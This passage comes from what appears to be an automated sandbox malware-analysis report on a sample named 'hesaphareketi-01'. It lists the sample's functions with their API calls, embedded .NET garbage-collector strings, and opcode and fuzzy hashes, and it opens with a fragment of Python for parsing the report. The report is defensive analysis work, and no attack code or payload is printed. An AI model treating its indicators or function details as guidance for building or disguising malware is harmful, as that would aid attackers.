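    print("Alloc/NUMA functions:", flag_alloc_numa(recs))
```

Feeding the full report text (copied out of this page) into parse_report gives one record per function; the Opcode ID is the stable key to carry into other reports, while the API ID is the coarse key to compare before looking at fuzzy hashes.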

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventRegister
                                                  • String ID: gcConservative
                                                  • API String ID: 3840811365-1953527212
                                                  • Opcode ID: ffe3c2faf81b3ef910fad80c62d0f8518216a282887ed91876dae107d6d140ff
                                                  • Instruction ID: 42a7216b01e88a5b23b91b2d2038e6822da3e74497e7e05dc857c5fe5f6a03f6
                                                  • Opcode Fuzzy Hash: ffe3c2faf81b3ef910fad80c62d0f8518216a282887ed91876dae107d6d140ff
                                                  • Instruction Fuzzy Hash: AC311B63A19A47A1EE08BF56F8C01B9A370FB46B48FC00039C94D9B661DF3CE544E760

                                                  Control-flow Graph

                                                  APIs
                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF734238E79,?,?,?,?,00007FF7341DD9D1,?,?,?,00007FF7341DDF4C,00000000,00000020,?), ref: 00007FF734238D8A
                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF734238DA0
                                                    • Part of subcall function 00007FF7342397AC: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7342397B5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                                                  • String ID:
                                                  • API String ID: 205171174-0
                                                  • Opcode ID: 95691fa6baedfe018d50a01fc6fec94552b967e93a3eb7814b2b8a2ad8293209
                                                  • Instruction ID: d07579c633ae30739752e7054d42287003f8fc781facff7d0a24bae4ab253354
                                                  • Opcode Fuzzy Hash: 95691fa6baedfe018d50a01fc6fec94552b967e93a3eb7814b2b8a2ad8293209
                                                  • Instruction Fuzzy Hash: 11E0EC40E0910B71FD5D3D7318950B491A04F2A774EAC1B30DD3EEC2C2AD1FB451A530
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave
                                                  • String ID:
                                                  • API String ID: 3168844106-0
                                                  • Opcode ID: 30e9e35b31ec2547a70cda4d383b3805e38872ae1b4e46b8a6fe90720136f9e7
                                                  • Instruction ID: 02c9cfa6cb882105175325238e68868d80765958115444c29a9181d603deb233
                                                  • Opcode Fuzzy Hash: 30e9e35b31ec2547a70cda4d383b3805e38872ae1b4e46b8a6fe90720136f9e7
                                                  • Instruction Fuzzy Hash: 2141B862A18A42A5DA18AF17A9C0174A394EF15BF4F844338DA7CD76E9CF3CE442D350
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: d4ca215575fd0c6e0bae6fe572d759c8f06235c4c5b30343d008d1ca5d55f1ae
                                                  • Instruction ID: d53fa511f0f61d0b7c2eb2aedb227e9b2a2980feec2bf06efb73e89247d08d90
                                                  • Opcode Fuzzy Hash: d4ca215575fd0c6e0bae6fe572d759c8f06235c4c5b30343d008d1ca5d55f1ae
                                                  • Instruction Fuzzy Hash: 1431D073B05E1292EA18AF16A49013AA3A0EF4ABD0F848134DF4D97B94DF38E5629350
                                                  APIs
                                                    • Part of subcall function 00007FF7341E27D0: VirtualFree.KERNELBASE ref: 00007FF7341E27DA
                                                  • EnterCriticalSection.KERNEL32(?,?,?,00007FF7341F64F9,?,?,?,00007FF7341FC51D), ref: 00007FF734210472
                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00007FF7341F64F9,?,?,?,00007FF7341FC51D), ref: 00007FF73421049C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeLeaveVirtual
                                                  • String ID:
                                                  • API String ID: 1320683145-0
                                                  • Opcode ID: b5911a8c8c100c65425a835202cd376d10abe74bf2f3be4458c4a8add018ab75
                                                  • Instruction ID: 70c6925fce4735e5e35cdb8251be0d26cd36b53df17833f26c0f6fbfc15ef5f2
                                                  • Opcode Fuzzy Hash: b5911a8c8c100c65425a835202cd376d10abe74bf2f3be4458c4a8add018ab75
                                                  • Instruction Fuzzy Hash: 2FF08617E08652B0EA18AF17F8C4279E3A4BF417A0FC50139E55D97D52CE3CD881E310
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Virtual$AllocFree
                                                  • String ID:
                                                  • API String ID: 2087232378-0
                                                  • Opcode ID: 21fe628a8c245d1f009263de4e24fe02042f17ce3a1401def6f39cd1a18418fe
                                                  • Instruction ID: 7c90269e8292c3b536e7e5d78d98ea3d491c31974f42414322fca9161387df1e
                                                  • Opcode Fuzzy Hash: 21fe628a8c245d1f009263de4e24fe02042f17ce3a1401def6f39cd1a18418fe
                                                  • Instruction Fuzzy Hash: A8E0C234F1651192EF1CAF13BCC266593916F9AB00FD4803CC40D93350DE3DA59AAB20
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BreakDebug
                                                  • String ID:
                                                  • API String ID: 456121617-0
                                                  • Opcode ID: bb02521482f357d091ee9155b463287af1990604d8e730fb2d95daa1db2f584a
                                                  • Instruction ID: bd1f2a480c1a8d84bcce50ad0d033a878a0583cd2562d8ae065745df60586a67
                                                  • Opcode Fuzzy Hash: bb02521482f357d091ee9155b463287af1990604d8e730fb2d95daa1db2f584a
                                                  • Instruction Fuzzy Hash: 4341C62BE08A4253FA58AE13E4815B9B391EB457E0F840235DE6DA37C5DF3CE481A214
                                                  APIs
                                                  • CoInitializeEx.OLE32(?,?,?,?,00000010,?,?,?,?,?,?,?,00007FF73427421E), ref: 00007FF734274312
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 5e8ccba725479bacf824188a23d3d2666fff54803f6ae21bdc45e87f4798a48e
                                                  • Instruction ID: 3940e745cdec12ac27e3a39c9a1dd6a5f1c0ab81211ca1db6660af4cffae6e47
                                                  • Opcode Fuzzy Hash: 5e8ccba725479bacf824188a23d3d2666fff54803f6ae21bdc45e87f4798a48e
                                                  • Instruction Fuzzy Hash: CE21F823E0C42275FB29BE63A8825FDD6606F41754FE44035ED5CA7A87DE2DA8839260
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFailFastQueryRaiseVirtual
                                                  • String ID:
                                                  • API String ID: 3307674043-0
                                                  • Opcode ID: 2c91771eec3dc57a2273c33921620eef897886fe8a235db23191d302b680ff9f
                                                  • Instruction ID: 2db8bed71c21836086418eb5549736442a17e91035ce66726dcf2217fc3461c7
                                                  • Opcode Fuzzy Hash: 2c91771eec3dc57a2273c33921620eef897886fe8a235db23191d302b680ff9f
                                                  • Instruction Fuzzy Hash: 4711947250878192DB18EF26B4411AAB360FB457B4F444335EABD8B7D5DF39D0028700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeVirtual
                                                  • String ID:
                                                  • API String ID: 1263568516-0
                                                  • Opcode ID: f9194b57a0946cc2409ad4d497bf7a480cce94f9d72206b6568b2ab60965888a
                                                  • Instruction ID: 75e1edefb8e820626fd8809e94a750a5a93c5a5b551f5f04f3c5f2121151ef2c
                                                  • Opcode Fuzzy Hash: f9194b57a0946cc2409ad4d497bf7a480cce94f9d72206b6568b2ab60965888a
                                                  • Instruction Fuzzy Hash: BFB01210F16011C2E3083B237CC271802142B49B12FD50028C608F2350CD2C91E52B21
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCWriteBarrier$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
                                                  • API String ID: 0-658696054
                                                  • Opcode ID: 5d91cec8345dcd14847125137ea3c03a11dcadacceb965cd2ffe1bbf1cb37226
                                                  • Instruction ID: b3ec5d9b7d4965ddaaec48987e0ca1efd0a1cd788b8f356db3d72bb76bac6a9a
                                                  • Opcode Fuzzy Hash: 5d91cec8345dcd14847125137ea3c03a11dcadacceb965cd2ffe1bbf1cb37226
                                                  • Instruction Fuzzy Hash: 6E329F72A08A57A2EB68AF56FC90AA9A364FF457C8FC11136D98C53F24DF3CD2019714
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                                                  • API String ID: 0-2080704861
                                                  • Opcode ID: 1d9ea1ae8f7853fcbb2035dbdcf46aaac34e09551b1d5d4f4f36f9c21da8c312
                                                  • Instruction ID: 4455bb8e0129b268600fb97e804e79cbe7302804592aaea192f6a25a67079936
                                                  • Opcode Fuzzy Hash: 1d9ea1ae8f7853fcbb2035dbdcf46aaac34e09551b1d5d4f4f36f9c21da8c312
                                                  • Instruction Fuzzy Hash: C2F1D792E29947B0EE08FF57ECD01F4A365AF86310BC5407AD04DE70659E7CA649E3B4
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                                                  • String ID: SeLockMemoryPrivilege
                                                  • API String ID: 1752251271-475654710
                                                  • Opcode ID: 1a2862dd90dccfa9a81e54bf5d2b295596dc0d2044562f65404962315b9e1cb2
                                                  • Instruction ID: 5c1c430c09f94b13ad46b00898d99c56344a92f364762969ed309638bacde55c
                                                  • Opcode Fuzzy Hash: 1a2862dd90dccfa9a81e54bf5d2b295596dc0d2044562f65404962315b9e1cb2
                                                  • Instruction Fuzzy Hash: 6131D635A0CA5292FB68AF62F89437AE7A1FF84B84F841039DA4D97754CE3DD444D720
                                                  APIs
                                                  • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF7341D8880,?,?,?,?,?,?,?,?,?), ref: 00007FF7341D7F4B
                                                  • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF7341D8880,?,?,?,?,?,?,?,?,?), ref: 00007FF7341D80AA
                                                  • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF7341D8880,?,?,?,?,?,?,?,?,?), ref: 00007FF7341D81A0
                                                  • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF7341D8880,?,?,?,?,?,?,?,?,?), ref: 00007FF7341D81B6
                                                  • RaiseFailFastException.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF7341D8880,?,?,?,?,?,?,?,?,?), ref: 00007FF7341D8216
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFailFastRaise
                                                  • String ID: [ KeepUnwinding ]
                                                  • API String ID: 2546344036-400895726
                                                  • Opcode ID: 915c5e9101982ef85af9a43bc3cfe156fed0120c7793f84e5fde07d7cabb1885
                                                  • Instruction ID: 97e984fc0e202adb4403688058881808f34225ef3864d812f5122867e9725a75
                                                  • Opcode Fuzzy Hash: 915c5e9101982ef85af9a43bc3cfe156fed0120c7793f84e5fde07d7cabb1885
                                                  • Instruction Fuzzy Hash: B2C193B3609F42A5EF589F26E4802B973A1FB05B48F944135CE5D47368CF79E495D320
                                                  APIs
                                                  Strings
                                                  • The required instruction sets are not supported by the current CPU., xrefs: 00007FF7341D556E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFailFastRaise
                                                  • String ID: The required instruction sets are not supported by the current CPU.
                                                  • API String ID: 2546344036-3318624164
                                                  • Opcode ID: bf7b72df4d136d0aac6dca5c477934f391bb1e94f0d28fd6456ad0c696d7c5ec
                                                  • Instruction ID: e89219c3fffb3c5fcc4abbd69c69869c00f4fff7466b9db3a8c08822db3fec83
                                                  • Opcode Fuzzy Hash: bf7b72df4d136d0aac6dca5c477934f391bb1e94f0d28fd6456ad0c696d7c5ec
